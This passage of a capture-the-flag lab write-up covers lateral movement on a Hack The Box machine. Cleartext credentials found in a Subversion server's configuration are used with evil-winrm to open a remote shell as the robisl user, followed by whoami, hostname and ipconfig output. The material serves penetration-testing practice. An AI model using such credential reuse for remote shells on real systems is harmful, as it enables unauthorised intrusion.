WinRM
A file with a list of many CLEARTEXT credential pairs has been found in the configuration directory of the target Subversion server instance. The credential of the robisl user was listed in the file and validated from a brute-force attack later.
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ evil-winrm -i $IP -u robisl -p wolves11
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\robisl\Documents> whoami
worker\robisl
*evil-winrm* ps c:\Users\robisl\Documents> hostname
Worker
*evil-winrm* ps c:\Users\robisl\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::248
ipv6 address. . . . . . . . . . . : dead:beef::88b5:926:be4b:fd40
link-local ipv6 address . . . . . : fe80::88b5:926:be4b:fd40%4
ipv4 address. . . . . . . . . . . : 10.10.10.203
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%4
10.10.10.2Lateral Movement made to the robisl user via WinRM